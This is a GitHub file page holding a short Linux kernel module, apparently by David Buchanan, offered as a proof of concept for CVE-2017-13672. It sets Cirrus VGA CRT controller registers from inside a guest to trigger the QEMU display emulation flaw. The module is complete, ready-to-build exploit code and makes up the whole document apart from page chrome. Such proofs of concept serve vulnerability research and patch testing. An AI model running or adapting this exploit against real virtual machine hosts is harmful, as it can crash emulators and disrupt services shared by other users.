Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-2017-13672/linux-module/CVE-2017-13672.c
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
63 lines (48 sloc)
1.77 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define LINUX | |
| #include <linux/module.h> | |
| #include <linux/kernel.h> | |
| #include <linux/init.h> | |
| #include <asm/io.h> | |
| #define DRIVER_AUTHOR "David Buchanan" | |
| #define DRIVER_DESC "CVE-2017-13672 POC" | |
| /* From qemu/hw/display/vga_regs.h */ | |
| #define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */ | |
| #define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */ | |
| /* From CL-GD5446 Technical Reference Manual */ | |
| #define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */ | |
| #define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */ | |
| #define VGA_CR1B 0x1B /* Extended Display Controls Register */ | |
| #define VGA_CR1D 0x1D /* Overlay Extended Control Register */ | |
| unsigned char crc_bak, crd_bak, cr1b_bak, cr1d_bak; | |
| unsigned char vga_crt_read(unsigned char reg) { | |
| outb_p(reg, VGA_CRT_IC); | |
| return inb_p(VGA_CRT_DC); | |
| } | |
| void vga_crt_write(unsigned char val, unsigned char reg) { | |
| outb_p(reg, VGA_CRT_IC); | |
| outb_p(val, VGA_CRT_DC); | |
| } | |
| int init_module(void) | |
| { | |
| printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n"); | |
| crc_bak = vga_crt_read(VGA_CRC); | |
| crd_bak = vga_crt_read(VGA_CRD); | |
| cr1b_bak = vga_crt_read(VGA_CR1B); | |
| cr1d_bak = vga_crt_read(VGA_CR1D); | |
| vga_crt_write(0xFF, VGA_CRC); | |
| vga_crt_write(0xFF, VGA_CRD); | |
| vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B); | |
| vga_crt_write(cr1d_bak | 0x80, VGA_CR1D); // usually only this bit needs to be set | |
| return 0; | |
| } | |
| void cleanup_module(void) | |
| { | |
| printk("If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n"); | |
| vga_crt_write(crc_bak, VGA_CRC); | |
| vga_crt_write(crd_bak, VGA_CRD); | |
| vga_crt_write(cr1b_bak, VGA_CR1B); | |
| vga_crt_write(cr1d_bak, VGA_CR1D); | |
| } | |
| MODULE_LICENSE("Dual MIT/GPL"); | |
| MODULE_AUTHOR(DRIVER_AUTHOR); | |
| MODULE_DESCRIPTION(DRIVER_DESC); |